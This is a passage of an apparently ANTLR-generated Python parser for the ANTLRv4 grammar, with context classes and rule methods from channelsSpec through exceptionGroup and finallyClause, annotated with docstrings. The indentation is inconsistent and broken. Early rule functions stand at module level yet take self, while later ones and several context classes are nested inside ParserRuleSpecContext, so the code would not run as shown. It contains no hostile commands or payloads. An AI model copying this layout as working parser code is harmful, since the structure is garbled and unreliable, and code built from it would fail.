        self.parser = parser
    def CHANNELS(self):
        return self.getToken(ANTLRv4Parser.CHANNELS, 0)
    def RBRACE(self):
        return self.getToken(ANTLRv4Parser.RBRACE, 0)
    def idList(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdListContext,0)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_channelsSpec
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterChannelsSpec" ):
            listener.enterChannelsSpec(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitChannelsSpec" ):
            listener.exitChannelsSpec(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitChannelsSpec" ):
            return visitor.visitChannelsSpec(self)
        else:
            return visitor.visitChildren(self)

def channelsSpec(self):
    """Parse the `channelsSpec` rule.

    Grammar (from the match/optional below):
        channelsSpec : CHANNELS idList? RBRACE ;
    Mirrors tokensSpec, but the idList is not stored in a labeled field.
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.ChannelsSpecContext(self, self._ctx, self.state)
    self.enterRule(localctx, 18, self.RULE_channelsSpec)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 207
        self.match(ANTLRv4Parser.CHANNELS)
        self.state = 209
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        if _la==ANTLRv4Parser.TOKEN_REF or _la==ANTLRv4Parser.RULE_REF:
            self.state = 208
            self.idList()
        self.state = 211
        self.match(ANTLRv4Parser.RBRACE)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class IdListContext(ParserRuleContext):
    """Generated parse-tree context for the `idList` rule.

    defs -- list of every IdentifierContext parsed in the list.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self._identifier = None # IdentifierContext
        self.defs = list() # of IdentifierContexts
    def identifier(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.IdentifierContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,i)
    def COMMA(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.COMMA)
        else:
            return self.getToken(ANTLRv4Parser.COMMA, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_idList
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterIdList" ):
            listener.enterIdList(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitIdList" ):
            listener.exitIdList(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitIdList" ):
            return visitor.visitIdList(self)
        else:
            return visitor.visitChildren(self)

def idList(self):
    """Parse the `idList` rule.

    Grammar (from the loop/optional below):
        idList : identifier (COMMA identifier)* COMMA? ;
    Because a COMMA may either continue the list or be the optional trailing
    comma, the loop uses adaptivePredict (ATN decision 11) rather than plain
    one-token lookahead. NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.IdListContext(self, self._ctx, self.state)
    self.enterRule(localctx, 20, self.RULE_idList)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 213
        localctx._identifier = self.identifier()
        localctx.defs.append(localctx._identifier)
        self.state = 218
        self._errHandler.sync(self)
        _alt = self._interp.adaptivePredict(self._input,11,self._ctx)
        while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
            if _alt==1:
                self.state = 214
                self.match(ANTLRv4Parser.COMMA)
                self.state = 215
                localctx._identifier = self.identifier()
                localctx.defs.append(localctx._identifier)
            self.state = 220
            self._errHandler.sync(self)
            _alt = self._interp.adaptivePredict(self._input,11,self._ctx)
        self.state = 222
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        if _la==ANTLRv4Parser.COMMA:
            self.state = 221
            self.match(ANTLRv4Parser.COMMA)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ActionContext(ParserRuleContext):
    """Generated parse-tree context for the `action` rule (named @-action)."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def AT(self):
        return self.getToken(ANTLRv4Parser.AT, 0)
    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
    def actionBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)
    def actionScopeName(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ActionScopeNameContext,0)
    def COLONCOLON(self):
        return self.getToken(ANTLRv4Parser.COLONCOLON, 0)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_action
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterAction" ):
            listener.enterAction(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitAction" ):
            listener.exitAction(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitAction" ):
            return visitor.visitAction(self)
        else:
            return visitor.visitChildren(self)

def action(self):
    """Parse the `action` rule.

    Grammar (from the matches below):
        action : AT (actionScopeName COLONCOLON)? identifier actionBlock ;
    The optional scope prefix is resolved with adaptivePredict (ATN decision
    13), since an identifier can start either branch.
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.ActionContext(self, self._ctx, self.state)
    self.enterRule(localctx, 22, self.RULE_action)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 224
        self.match(ANTLRv4Parser.AT)
        self.state = 228
        self._errHandler.sync(self)
        la_ = self._interp.adaptivePredict(self._input,13,self._ctx)
        if la_ == 1:
            self.state = 225
            self.actionScopeName()
            self.state = 226
            self.match(ANTLRv4Parser.COLONCOLON)
        self.state = 230
        self.identifier()
        self.state = 231
        self.actionBlock()
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ActionScopeNameContext(ParserRuleContext):
    """Generated parse-tree context for the `actionScopeName` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
    def LEXER(self):
        return self.getToken(ANTLRv4Parser.LEXER, 0)
    def PARSER(self):
        return self.getToken(ANTLRv4Parser.PARSER, 0)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_actionScopeName
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterActionScopeName" ):
            listener.enterActionScopeName(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitActionScopeName" ):
            listener.exitActionScopeName(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitActionScopeName" ):
            return visitor.visitActionScopeName(self)
        else:
            return visitor.visitChildren(self)

def actionScopeName(self):
    """Parse the `actionScopeName` rule.

    Grammar (from the dispatch below):
        actionScopeName : identifier | LEXER | PARSER ;
    LEXER/PARSER are keywords elsewhere, so they get explicit alternatives
    here to remain usable as scope names.
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.ActionScopeNameContext(self, self._ctx, self.state)
    self.enterRule(localctx, 24, self.RULE_actionScopeName)
    try:
        self.state = 236
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
            self.enterOuterAlt(localctx, 1)
            self.state = 233
            self.identifier()
            pass
        elif token in [ANTLRv4Parser.LEXER]:
            self.enterOuterAlt(localctx, 2)
            self.state = 234
            self.match(ANTLRv4Parser.LEXER)
            pass
        elif token in [ANTLRv4Parser.PARSER]:
            self.enterOuterAlt(localctx, 3)
            self.state = 235
            self.match(ANTLRv4Parser.PARSER)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ActionBlockContext(ParserRuleContext):
    """Generated parse-tree context for the `actionBlock` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def BEGIN_ACTION(self):
        return self.getToken(ANTLRv4Parser.BEGIN_ACTION, 0)
    def END_ACTION(self):
        return self.getToken(ANTLRv4Parser.END_ACTION, 0)
    def ACTION_CONTENT(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.ACTION_CONTENT)
        else:
            return self.getToken(ANTLRv4Parser.ACTION_CONTENT, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_actionBlock
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterActionBlock" ):
            listener.enterActionBlock(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitActionBlock" ):
            listener.exitActionBlock(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitActionBlock" ):
            return visitor.visitActionBlock(self)
        else:
            return visitor.visitChildren(self)

def actionBlock(self):
    """Parse the `actionBlock` rule.

    Grammar (from the match/loop below):
        actionBlock : BEGIN_ACTION ACTION_CONTENT* END_ACTION ;
    The target-language code between braces arrives as opaque ACTION_CONTENT
    tokens produced by a lexer mode. NOTE: generated by the ANTLR tool;
    do not edit by hand.
    """
    localctx = ANTLRv4Parser.ActionBlockContext(self, self._ctx, self.state)
    self.enterRule(localctx, 26, self.RULE_actionBlock)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 238
        self.match(ANTLRv4Parser.BEGIN_ACTION)
        self.state = 242
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        while _la==ANTLRv4Parser.ACTION_CONTENT:
            self.state = 239
            self.match(ANTLRv4Parser.ACTION_CONTENT)
            self.state = 244
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 245
        self.match(ANTLRv4Parser.END_ACTION)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ArgActionBlockContext(ParserRuleContext):
    """Generated parse-tree context for the `argActionBlock` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def BEGIN_ARGUMENT(self):
        return self.getToken(ANTLRv4Parser.BEGIN_ARGUMENT, 0)
    def END_ARGUMENT(self):
        return self.getToken(ANTLRv4Parser.END_ARGUMENT, 0)
    def ARGUMENT_CONTENT(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.ARGUMENT_CONTENT)
        else:
            return self.getToken(ANTLRv4Parser.ARGUMENT_CONTENT, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_argActionBlock
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterArgActionBlock" ):
            listener.enterArgActionBlock(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitArgActionBlock" ):
            listener.exitArgActionBlock(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitArgActionBlock" ):
            return visitor.visitArgActionBlock(self)
        else:
            return visitor.visitChildren(self)

def argActionBlock(self):
    """Parse the `argActionBlock` rule.

    Grammar (from the match/loop below):
        argActionBlock : BEGIN_ARGUMENT ARGUMENT_CONTENT* END_ARGUMENT ;
    Structurally identical to actionBlock, but for bracketed rule-argument
    text. NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.ArgActionBlockContext(self, self._ctx, self.state)
    self.enterRule(localctx, 28, self.RULE_argActionBlock)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 247
        self.match(ANTLRv4Parser.BEGIN_ARGUMENT)
        self.state = 251
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        while _la==ANTLRv4Parser.ARGUMENT_CONTENT:
            self.state = 248
            self.match(ANTLRv4Parser.ARGUMENT_CONTENT)
            self.state = 253
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 254
        self.match(ANTLRv4Parser.END_ARGUMENT)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ModeSpecContext(ParserRuleContext):
    """Generated parse-tree context for the `modeSpec` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def MODE(self):
        return self.getToken(ANTLRv4Parser.MODE, 0)
    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)
    def SEMI(self):
        return self.getToken(ANTLRv4Parser.SEMI, 0)
    def lexerRuleSpec(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.LexerRuleSpecContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.LexerRuleSpecContext,i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_modeSpec
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterModeSpec" ):
            listener.enterModeSpec(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitModeSpec" ):
            listener.exitModeSpec(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitModeSpec" ):
            return visitor.visitModeSpec(self)
        else:
            return visitor.visitChildren(self)

def modeSpec(self):
    """Parse the `modeSpec` rule.

    Grammar (from the match/loop below):
        modeSpec : MODE identifier SEMI lexerRuleSpec* ;
    The loop continues while the lookahead is in the lexer-rule start set
    (TOKEN_REF, DOC_COMMENT, or FRAGMENT), tested via the bitmask below.
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.ModeSpecContext(self, self._ctx, self.state)
    self.enterRule(localctx, 30, self.RULE_modeSpec)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 256
        self.match(ANTLRv4Parser.MODE)
        self.state = 257
        self.identifier()
        self.state = 258
        self.match(ANTLRv4Parser.SEMI)
        self.state = 262
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Bitmask membership test: token type must be < 64 and in the set.
        while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.FRAGMENT))) != 0):
            self.state = 259
            self.lexerRuleSpec()
            self.state = 264
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class RulesContext(ParserRuleContext):
    """Generated parse-tree context for the `rules` rule."""
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
    def ruleSpec(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.RuleSpecContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.RuleSpecContext,i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_rules
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterRules" ):
            listener.enterRules(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitRules" ):
            listener.exitRules(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitRules" ):
            return visitor.visitRules(self)
        else:
            return visitor.visitChildren(self)

def rules(self):
    """Parse the `rules` rule.

    Grammar (from the loop below):
        rules : ruleSpec* ;
    The start set for ruleSpec (bitmask below) is TOKEN_REF, RULE_REF,
    DOC_COMMENT, HEADER, FRAGMENT, PROTECTED, PUBLIC, PRIVATE.
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.RulesContext(self, self._ctx, self.state)
    self.enterRule(localctx, 32, self.RULE_rules)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 268
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.RULE_REF) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.HEADER) | (1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0):
            self.state = 265
            self.ruleSpec()
            self.state = 270
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class RuleSpecContext(ParserRuleContext):
    """Generated parse-tree context for the `ruleSpec` rule.

    headers -- list of HEADER tokens collected before the rule proper.
    NOTE(review): HEADER is not in the stock ANTLRv4 grammar — presumably a
    project-specific grammar extension; confirm against the source .g4.
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self._HEADER = None # Token
        self.headers = list() # of Tokens
    def parserRuleSpec(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ParserRuleSpecContext,0)
    def lexerRuleSpec(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerRuleSpecContext,0)
    def HEADER(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.HEADER)
        else:
            return self.getToken(ANTLRv4Parser.HEADER, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_ruleSpec
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterRuleSpec" ):
            listener.enterRuleSpec(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitRuleSpec" ):
            listener.exitRuleSpec(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitRuleSpec" ):
            return visitor.visitRuleSpec(self)
        else:
            return visitor.visitChildren(self)

def ruleSpec(self):
    """Parse the `ruleSpec` rule.

    Grammar (from the loop/prediction below):
        ruleSpec : HEADER* (parserRuleSpec | lexerRuleSpec) ;
    adaptivePredict (ATN decision 20) picks between the parser-rule and
    lexer-rule branch; note that neither branch is required if the
    prediction yields no match (la_ not in {1, 2}).
    NOTE: generated by the ANTLR tool; do not edit by hand.
    """
    localctx = ANTLRv4Parser.RuleSpecContext(self, self._ctx, self.state)
    self.enterRule(localctx, 34, self.RULE_ruleSpec)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 274
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        while _la==ANTLRv4Parser.HEADER:
            self.state = 271
            localctx._HEADER = self.match(ANTLRv4Parser.HEADER)
            localctx.headers.append(localctx._HEADER)
            self.state = 276
            self._errHandler.sync(self)
            _la = self._input.LA(1)
        self.state = 279
        self._errHandler.sync(self)
        la_ = self._interp.adaptivePredict(self._input,20,self._ctx)
        if la_ == 1:
            self.state = 277
            self.parserRuleSpec()
            pass
        elif la_ == 2:
            self.state = 278
            self.lexerRuleSpec()
            pass
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ParserRuleSpecContext(ParserRuleContext):
    """Generated parse-tree context for the `parserRuleSpec` rule.

    Labeled members set during parsing:
      docs -- list of DOC_COMMENT tokens preceding the rule
      name -- the RULE_REF token naming the rule
    """
    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self._DOC_COMMENT = None # Token
        self.docs = list() # of Tokens
        self.name = None # Token
    def COLON(self):
        return self.getToken(ANTLRv4Parser.COLON, 0)
    def ruleBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.RuleBlockContext,0)
    def SEMI(self):
        return self.getToken(ANTLRv4Parser.SEMI, 0)
    def exceptionGroup(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ExceptionGroupContext,0)
    def RULE_REF(self):
        return self.getToken(ANTLRv4Parser.RULE_REF, 0)
    def ruleModifiers(self):
        return self.getTypedRuleContext(ANTLRv4Parser.RuleModifiersContext,0)
    def argActionBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)
    def ruleReturns(self):
        return self.getTypedRuleContext(ANTLRv4Parser.RuleReturnsContext,0)
    def throwsSpec(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ThrowsSpecContext,0)
    def localsSpec(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LocalsSpecContext,0)
    def rulePrequel(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.RulePrequelContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.RulePrequelContext,i)
    def DOC_COMMENT(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.DOC_COMMENT)
        else:
            return self.getToken(ANTLRv4Parser.DOC_COMMENT, i)
    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_parserRuleSpec
    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParserRuleSpec" ):
            listener.enterParserRuleSpec(self)
    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParserRuleSpec" ):
            listener.exitParserRuleSpec(self)
    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitParserRuleSpec" ):
            return visitor.visitParserRuleSpec(self)
        else:
            return visitor.visitChildren(self)
    def parserRuleSpec(self):
        """Parse the 'parserRuleSpec' rule (auto-generated ANTLR code).

        Matches: DOC_COMMENT* ruleModifiers? RULE_REF argActionBlock?
        ruleReturns? throwsSpec? localsSpec? rulePrequel* COLON ruleBlock
        SEMI exceptionGroup.

        Returns the populated ParserRuleSpecContext; on a recognition error
        the exception is recorded on the context and recovery is attempted.
        """
        localctx = ANTLRv4Parser.ParserRuleSpecContext(self, self._ctx, self.state)
        self.enterRule(localctx, 36, self.RULE_parserRuleSpec)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            # DOC_COMMENT* : collect any leading documentation comments.
            self.state = 284
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.DOC_COMMENT:
                self.state = 281
                localctx._DOC_COMMENT = self.match(ANTLRv4Parser.DOC_COMMENT)
                localctx.docs.append(localctx._DOC_COMMENT)
                self.state = 286
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            # ruleModifiers? : present when lookahead is FRAGMENT/PROTECTED/PUBLIC/PRIVATE.
            self.state = 288
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.FRAGMENT) | (1 << ANTLRv4Parser.PROTECTED) | (1 << ANTLRv4Parser.PUBLIC) | (1 << ANTLRv4Parser.PRIVATE))) != 0):
                self.state = 287
                self.ruleModifiers()

            # The rule name itself.
            self.state = 290
            localctx.name = self.match(ANTLRv4Parser.RULE_REF)
            # argActionBlock? : optional [...] argument action.
            self.state = 292
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.BEGIN_ARGUMENT:
                self.state = 291
                self.argActionBlock()

            # ruleReturns?
            self.state = 295
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.RETURNS:
                self.state = 294
                self.ruleReturns()

            # throwsSpec?
            self.state = 298
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.THROWS:
                self.state = 297
                self.throwsSpec()

            # localsSpec?
            self.state = 301
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.LOCALS:
                self.state = 300
                self.localsSpec()

            # rulePrequel* : options specs and rule actions before the colon.
            self.state = 306
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.OPTIONS or _la==ANTLRv4Parser.AT:
                self.state = 303
                self.rulePrequel()
                self.state = 308
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            # COLON ruleBlock SEMI exceptionGroup
            self.state = 309
            self.match(ANTLRv4Parser.COLON)
            self.state = 310
            self.ruleBlock()
            self.state = 311
            self.match(ANTLRv4Parser.SEMI)
            self.state = 312
            self.exceptionGroup()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class ExceptionGroupContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'exceptionGroup' rule:
        #   exceptionHandler* finallyClause?

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def exceptionHandler(self, i:int=None):
            # With i=None returns all exceptionHandler children, otherwise the i-th one.
            if i is None:
                return self.getTypedRuleContexts(ANTLRv4Parser.ExceptionHandlerContext)
            else:
                return self.getTypedRuleContext(ANTLRv4Parser.ExceptionHandlerContext,i)

        def finallyClause(self):
            return self.getTypedRuleContext(ANTLRv4Parser.FinallyClauseContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_exceptionGroup

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterExceptionGroup" ):
                listener.enterExceptionGroup(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitExceptionGroup" ):
                listener.exitExceptionGroup(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitExceptionGroup" ):
                return visitor.visitExceptionGroup(self)
            else:
                return visitor.visitChildren(self)
    def exceptionGroup(self):
        """Parse the 'exceptionGroup' rule (auto-generated ANTLR code).

        Matches: exceptionHandler* finallyClause?  Returns the populated
        ExceptionGroupContext.
        """
        localctx = ANTLRv4Parser.ExceptionGroupContext(self, self._ctx, self.state)
        self.enterRule(localctx, 38, self.RULE_exceptionGroup)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            # exceptionHandler* : one per leading CATCH token.
            self.state = 317
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            while _la==ANTLRv4Parser.CATCH:
                self.state = 314
                self.exceptionHandler()
                self.state = 319
                self._errHandler.sync(self)
                _la = self._input.LA(1)

            # finallyClause? : present when lookahead is FINALLY.
            self.state = 321
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.FINALLY:
                self.state = 320
                self.finallyClause()

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class ExceptionHandlerContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'exceptionHandler' rule:
        #   CATCH argActionBlock actionBlock

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def CATCH(self):
            return self.getToken(ANTLRv4Parser.CATCH, 0)

        def argActionBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ArgActionBlockContext,0)

        def actionBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_exceptionHandler

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterExceptionHandler" ):
                listener.enterExceptionHandler(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitExceptionHandler" ):
                listener.exitExceptionHandler(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitExceptionHandler" ):
                return visitor.visitExceptionHandler(self)
            else:
                return visitor.visitChildren(self)
    def exceptionHandler(self):
        """Parse the 'exceptionHandler' rule (auto-generated ANTLR code).

        Matches: CATCH argActionBlock actionBlock.  Returns the populated
        ExceptionHandlerContext.
        """
        localctx = ANTLRv4Parser.ExceptionHandlerContext(self, self._ctx, self.state)
        self.enterRule(localctx, 40, self.RULE_exceptionHandler)
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 323
            self.match(ANTLRv4Parser.CATCH)
            self.state = 324
            self.argActionBlock()
            self.state = 325
            self.actionBlock()
        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
    class FinallyClauseContext(ParserRuleContext):
        # Auto-generated (ANTLR) parse-tree node for the 'finallyClause' rule:
        #   FINALLY actionBlock

        def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
            super().__init__(parent, invokingState)
            self.parser = parser

        def FINALLY(self):
            return self.getToken(ANTLRv4Parser.FINALLY, 0)

        def actionBlock(self):
            return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)

        def getRuleIndex(self):
            return ANTLRv4Parser.RULE_finallyClause

        def enterRule(self, listener:ParseTreeListener):
            if hasattr( listener, "enterFinallyClause" ):
                listener.enterFinallyClause(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitFinallyClause" ):
                listener.exitFinallyClause(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitFinallyClause" ):
                return visitor.visitFinallyClause(self)
            else:
                return visitor.visitChildren(self)
    def finallyClause(self):
        """Parse the 'finallyClause' rule (auto-generated ANTLR code).

